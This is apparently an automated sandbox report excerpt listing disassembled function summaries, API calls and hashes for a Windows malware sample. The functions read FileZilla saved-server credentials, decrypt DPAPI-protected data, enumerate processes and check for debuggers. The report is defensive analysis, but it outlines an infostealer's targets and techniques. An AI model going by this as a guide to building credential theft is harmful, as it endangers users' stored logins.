                                       • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                      • String ID:
                                      • API String ID: 2579439406-0
                                      • Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                      • Instruction ID: 2759986af63cf1bc905e0f8428f5e2b998159022a12c47e0d709fe691c65c3be
                                      • Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                      • Instruction Fuzzy Hash: E921A3BC9002059FDB10DF69FD89A963BE4FB0A314F50403AE90A87264DBB45981EF4D
                                      APIs
                                      • IsDebuggerPresent.KERNEL32 ref: 0231BE09
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0231BE1E
                                      • UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 0231BE29
                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 0231BE45
                                      • TerminateProcess.KERNEL32(00000000), ref: 0231BE4C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                      • String ID:
                                      • API String ID: 2579439406-0
                                      • Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                      • Instruction ID: 765a9a4e3db10b4df7821155ec3c23ae37dac8129afe039f10a6f596730e4a40
                                      • Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                      • Instruction Fuzzy Hash: 3C21A0BC9002059FDB14DF69F8896967BF5FB0A314F50403AE90A872A4EBB05981EF49
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90), ref: 0040724D
                                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407254
                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00407281
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,00407C90,80000001,004161C4), ref: 004072A4
                                      • LocalFree.KERNEL32(?,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 004072AE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                      • String ID:
                                      • API String ID: 3657800372-0
                                      • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                      • Instruction ID: ec186dc502c88c98e3638293fff085d95328f9e4ca1f8ca95b137b7d6c986ae9
                                      • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                      • Instruction Fuzzy Hash: 900100B5A80208BBEB10DFD4DD45F9E77B9EB44704F104159FB05BA2C0D674AA018B66
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000008,00000400), ref: 023074B4
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 023074BB
                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 023074E8
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 0230750B
                                      • LocalFree.KERNEL32(?), ref: 02307515
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                      • String ID:
                                      • API String ID: 2609814428-0
                                      • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                      • Instruction ID: 45630c6271d2f57894d575792b5648b327a6ec6066b6f3c2adca00e17902538c
                                      • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                      • Instruction Fuzzy Hash: 7C010075A80208BBEB10DFD4DD45F9D77B9EB45704F104155F705AA2C0D670AA01CB65
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041961E
                                      • Process32First.KERNEL32(00420ACA,00000128), ref: 00419632
                                      • Process32Next.KERNEL32(00420ACA,00000128), ref: 00419647
                                      • StrCmpCA.SHLWAPI(?,00000000), ref: 0041965C
                                      • CloseHandle.KERNEL32(00420ACA), ref: 0041967A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 420147892-0
                                      • Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                      • Instruction ID: 11d567adce4b572477f284a2ec541547db87c4b6fd8ba8cb36d7f0fd64301d48
                                      • Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                      • Instruction Fuzzy Hash: F201E9B9A40208ABCB24DFA5C958BEEB7F9EB49700F104189E90996250D7389F81CF61
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02319885
                                      • Process32First.KERNEL32(00420ACA,00000128), ref: 02319899
                                      • Process32Next.KERNEL32(00420ACA,00000128), ref: 023198AE
                                      • StrCmpCA.SHLWAPI(?,00000000), ref: 023198C3
                                      • CloseHandle.KERNEL32(00420ACA), ref: 023198E1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 420147892-0
                                      • Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                      • Instruction ID: 89d1331c42da0ab26bab027bd5c7e13bcaf4bab7a9bc98089bd8ab841006ee6f
                                      • Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                      • Instruction Fuzzy Hash: 4B010C79A50208FFDB24DFE4CD54BEDB7F9EB49700F004189A505A6240D7749A40CF51
                                      APIs
                                        • Part of subcall function 0231A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0231A9EF
                                        • Part of subcall function 0231AB87: lstrcpy.KERNEL32(00000000,?), ref: 0231ABD9
                                        • Part of subcall function 0231AB87: lstrcat.KERNEL32(00000000), ref: 0231ABE9
                                        • Part of subcall function 0231AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0231AC2C
                                        • Part of subcall function 0231AC17: lstrcpy.KERNEL32(00000000), ref: 0231AC6B
                                        • Part of subcall function 0231AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0231AC79
                                        • Part of subcall function 0231AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0231AB6C
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214F0,00420D73), ref: 0230E709
                                      • StrCmpCA.SHLWAPI(?,004214F8), ref: 0230E759
                                      • StrCmpCA.SHLWAPI(?,004214FC), ref: 0230E76F
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0230EE46
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                      • String ID:
                                      • API String ID: 433455689-0
                                      • Opcode ID: f3dcec5693a34f3f639a4326c9ab4e832b2dce632252e8eb0e6dc656e0f1fa1e
                                      • Instruction ID: 99b49aa6f93fe456c25b98f3b5d81d7291ecd207f261f2b121aca48997aac7ac
                                      • Opcode Fuzzy Hash: f3dcec5693a34f3f639a4326c9ab4e832b2dce632252e8eb0e6dc656e0f1fa1e
                                      • Instruction Fuzzy Hash: 2512FC72A122189BCB2CFB60DDA5EED777AAF54301F4045ADA50A92090FF346F88CF51
                                      APIs
                                      • CryptBinaryToStringA.CRYPT32(00000000,00405184,40000001,00000000,00000000,?,00405184), ref: 00418EC0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: BinaryCryptString
                                      • String ID:
                                      • API String ID: 80407269-0
                                      • Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                      • Instruction ID: 3c4cb89ba01459054e3b3595e947631781f59a96386c3a2a773972b879479806
                                      • Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                      • Instruction Fuzzy Hash: 62111C74200204BFDB00CFA4D884FA733AAAF89304F109549F9198B250DB39EC82DB65
                                      APIs
                                      • CryptBinaryToStringA.CRYPT32(00000000,023053EB,40000001,00000000,00000000,?,023053EB), ref: 02319127
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: BinaryCryptString
                                      • String ID:
                                      • API String ID: 80407269-0
                                      • Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                      • Instruction ID: ebe03f2af88e9d2a6cfd8537cf68257402810fcbf1f40d623e6b5c17615e5ac5
                                      • Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                      • Instruction Fuzzy Hash: 6D11EC74204204BFDB04CF94DC99FA733AEAF8A754F009568F90A8B251D775E982DB60
                                      APIs
                                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,02305155,00000000,00000000), ref: 02309D56
                                      • LocalAlloc.KERNEL32(00000040,?,?,?,02305155,00000000,?), ref: 02309D68
                                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,02305155,00000000,00000000), ref: 02309D91
                                      • LocalFree.KERNEL32(?,?,?,?,02305155,00000000,?), ref: 02309DA6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
• API ID: BinaryCryptLocalString$AllocFree
• String ID:
APIs
• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
• LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
• memcpy.MSVCRT(?,?,?), ref: 00409BC6
• LocalFree.KERNEL32(?), ref: 00409BD3
Memory Dump Source
• Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• API ID: Local$AllocCryptDataFreeUnprotectmemcpy
• String ID:
APIs
• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 02309DEB
• LocalAlloc.KERNEL32(00000040,00000000), ref: 02309E0A
• memcpy.MSVCRT(?,?,?), ref: 02309E2D
• LocalFree.KERNEL32(?), ref: 02309E3A
Memory Dump Source
• Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
• API ID: Local$AllocCryptDataFreeUnprotectmemcpy
• String ID:
APIs
• GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00880DD0,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 00417A63
• HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,00880DD0,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A6A
• GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00880DD0,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A7D
• wsprintfA.USER32 ref: 00417AB7
Memory Dump Source
• Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• API ID: Heap$AllocInformationProcessTimeZonewsprintf
• String ID:
APIs
• CoCreateInstance.COMBASE(0041E118,00000000,00000001,0041E108,00000000), ref: 00413758
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 004137B0
Memory Dump Source
• Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• API ID: ByteCharCreateInstanceMultiWide
• String ID:
Strings
Memory Dump Source
• Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
• API ID:
• String ID: .$GetProcAddress.$l
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_0001CEA8), ref: 0041CEEF
Memory Dump Source
• Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• API ID: ExceptionFilterUnhandled
• String ID:
APIs
• SetUnhandledExceptionFilter.KERNEL32(0041CEA8), ref: 0231D156
Memory Dump Source
• Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
• API ID: ExceptionFilterUnhandled
• String ID:
APIs
Memory Dump Source
• Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
• API ID: free
• String ID:
APIs
  • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
  • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
  • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
  • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
  • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
  • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
  • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
  • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
  • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
  • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
  • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
  • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
  • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
  • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
  • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
  • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
• strtok_s.MSVCRT ref: 0041031B
• GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 00410362
• HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410369
• StrStrA.SHLWAPI(00000000,<Host>), ref: 00410385
• lstrlenA.KERNEL32(00000000), ref: 00410393
  • Part of subcall function 004188E0: malloc.MSVCRT ref: 004188E8
  • Part of subcall function 004188E0: strncpy.MSVCRT ref: 00418903
• StrStrA.SHLWAPI(00000000,<Port>), ref: 004103CF
• lstrlenA.KERNEL32(00000000), ref: 004103DD
• StrStrA.SHLWAPI(00000000,<User>), ref: 00410419
• lstrlenA.KERNEL32(00000000), ref: 00410427
• StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00410463
• lstrlenA.KERNEL32(00000000), ref: 00410475
• lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410502
• lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041051A
• lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00410532
• lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041054A
• lstrcatA.KERNEL32(?,browser: FileZilla,?,?,00000000), ref: 00410562
• lstrcatA.KERNEL32(?,profile: null,?,?,00000000), ref: 00410571
• lstrcatA.KERNEL32(?,url: ,?,?,00000000), ref: 00410580
• lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410593
• lstrcatA.KERNEL32(?,00421678,?,?,00000000), ref: 004105A2
• lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105B5
• lstrcatA.KERNEL32(?,0042167C,?,?,00000000), ref: 004105C4
• lstrcatA.KERNEL32(?,login: ,?,?,00000000), ref: 004105D3
• lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105E6
• lstrcatA.KERNEL32(?,00421688,?,?,00000000), ref: 004105F5
• lstrcatA.KERNEL32(?,password: ,?,?,00000000), ref: 00410604
• lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410617
• lstrcatA.KERNEL32(?,00421698,?,?,00000000), ref: 00410626
• lstrcatA.KERNEL32(?,0042169C,?,?,00000000), ref: 00410635
• strtok_s.MSVCRT ref: 00410679
• lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 0041068E
• memset.MSVCRT ref: 004106DD
Strings
Memory Dump Source
• Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$CloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
• String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$NA$NA$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
APIs
• lstrlen.KERNEL32(00424D98), ref: 02304833
• lstrlen.KERNEL32(00424E48), ref: 0230483E
• lstrlen.KERNEL32(00424F10), ref: 02304849
• lstrlen.KERNEL32(00424FC8), ref: 02304854
• lstrlen.KERNEL32(00425070), ref: 0230485F
• GetProcessHeap.KERNEL32(00000000,?), ref: 0230486E
• RtlAllocateHeap.NTDLL(00000000), ref: 02304875
• lstrlen.KERNEL32(00425118), ref: 02304883
• lstrlen.KERNEL32(004251C0), ref: 0230488E
• lstrlen.KERNEL32(00425268), ref: 02304899
• lstrlen.KERNEL32(00425310), ref: 023048A4
• lstrlen.KERNEL32(004253B8), ref: 023048AF
• lstrlen.KERNEL32(00425460), ref: 023048C3
• lstrlen.KERNEL32(00425508), ref: 023048CE
• lstrlen.KERNEL32(004255B0), ref: 023048D9
• lstrlen.KERNEL32(00425658), ref: 023048E4
• lstrlen.KERNEL32(00425700), ref: 023048EF
• lstrlen.KERNEL32(004257A8), ref: 02304918
• lstrlen.KERNEL32(00425850), ref: 02304923
• lstrlen.KERNEL32(00425918), ref: 0230492E
• lstrlen.KERNEL32(004259C0), ref: 02304939
• lstrlen.KERNEL32(00425A68), ref: 02304944
• strlen.MSVCRT ref: 02304957
• lstrlen.KERNEL32(00425B10), ref: 0230497F
• lstrlen.KERNEL32(00425BB8), ref: 0230498A
• lstrlen.KERNEL32(00425C60), ref: 02304995
• lstrlen.KERNEL32(00425D08), ref: 023049A0
• lstrlen.KERNEL32(00425DB0), ref: 023049AB
• lstrlen.KERNEL32(00425E58), ref: 023049BB
                                      • lstrlen.KERNEL32(00425F00), ref: 023049C6
                                      • lstrlen.KERNEL32(00425FA8), ref: 023049D1
                                      • lstrlen.KERNEL32(00426050), ref: 023049DC
                                      • lstrlen.KERNEL32(004260F8), ref: 023049E7
                                      • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 02304A03
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                      • String ID:
                                      • API String ID: 2127927946-0
                                      • Opcode ID: 94e7660d446ef400bbca7e6a05bf8504b75a8e0329621672810e0e1d9e7bb62d
                                      • Instruction ID: 8492b85c16501f9c2439b946e2e6b0276eef0f4b3857efee2193211f5b0f50bb
                                      • Opcode Fuzzy Hash: 94e7660d446ef400bbca7e6a05bf8504b75a8e0329621672810e0e1d9e7bb62d
                                      • Instruction Fuzzy Hash: 9E41BC79740624EBC718AFE5EC8DB987F71AB4C712BA0C062FA0295190C7F5D5019B3D
                                      APIs
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 02319B08
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 02319B21
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 02319B39
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 02319B51
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 02319B6A
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A2F8), ref: 02319B82
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A4D4), ref: 02319B9A
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 02319BB3
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A5A0), ref: 02319BCB
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A548), ref: 02319BE3
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A3BC), ref: 02319BFC
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 02319C14
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A60C), ref: 02319C2C
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A0B0), ref: 02319C45
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A598), ref: 02319C5D
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A224), ref: 02319C75
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A418), ref: 02319C8E
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A634), ref: 02319CA6
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A0BC), ref: 02319CBE
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A12C), ref: 02319CD7
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A2B0), ref: 02319CEF
                                      • LoadLibraryA.KERNEL32(0064A550,?,02316C67), ref: 02319D01
                                      • LoadLibraryA.KERNEL32(0064A17C,?,02316C67), ref: 02319D12
                                      • LoadLibraryA.KERNEL32(0064A104,?,02316C67), ref: 02319D24
                                      • LoadLibraryA.KERNEL32(0064A1DC,?,02316C67), ref: 02319D36
                                      • LoadLibraryA.KERNEL32(0064A328,?,02316C67), ref: 02319D47
                                      • GetProcAddress.KERNEL32(0064A6D4,0064A4AC), ref: 02319D69
                                      • GetProcAddress.KERNEL32(0064A7F4,0064A424), ref: 02319D8A
                                      • GetProcAddress.KERNEL32(0064A7F4,0064A1CC), ref: 02319DA2
                                      • GetProcAddress.KERNEL32(0064A8E4,0064A394), ref: 02319DC4
                                      • GetProcAddress.KERNEL32(0064A7A8,0064A128), ref: 02319DE5
                                      • GetProcAddress.KERNEL32(0064A7D8,0064A414), ref: 02319E06
                                      • GetProcAddress.KERNEL32(0064A7D8,00420724), ref: 02319E1D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad
                                      • String ID:
                                      • API String ID: 2238633743-0
                                      • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                      • Instruction ID: 5f6e0c8a67a94d7a20a5bef497d75f0b8269651878ac279db78dd9da6b658621
                                      • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                      • Instruction Fuzzy Hash: 17A14DBD5C0240BFE364EFE8ED98A963BFBF74E201714661AE605C3264D7399441DB12
                                      APIs
                                        • Part of subcall function 0231A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0231A9EF
                                        • Part of subcall function 02319047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 02319072
                                        • Part of subcall function 0231AB87: lstrcpy.KERNEL32(00000000,?), ref: 0231ABD9
                                        • Part of subcall function 0231AB87: lstrcat.KERNEL32(00000000), ref: 0231ABE9
                                        • Part of subcall function 0231AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0231AB6C
                                        • Part of subcall function 0231AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0231AC2C
                                        • Part of subcall function 0231AC17: lstrcpy.KERNEL32(00000000), ref: 0231AC6B
                                        • Part of subcall function 0231AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0231AC79
                                        • Part of subcall function 0231AA07: lstrcpy.KERNEL32(?,00000000), ref: 0231AA4D
                                        • Part of subcall function 02309C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 02309C53
                                        • Part of subcall function 02309C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 02309C78
                                        • Part of subcall function 02309C27: LocalAlloc.KERNEL32(00000040,?), ref: 02309C98
                                        • Part of subcall function 02309C27: ReadFile.KERNEL32(000000FF,?,00000000,023016F6,00000000), ref: 02309CC1
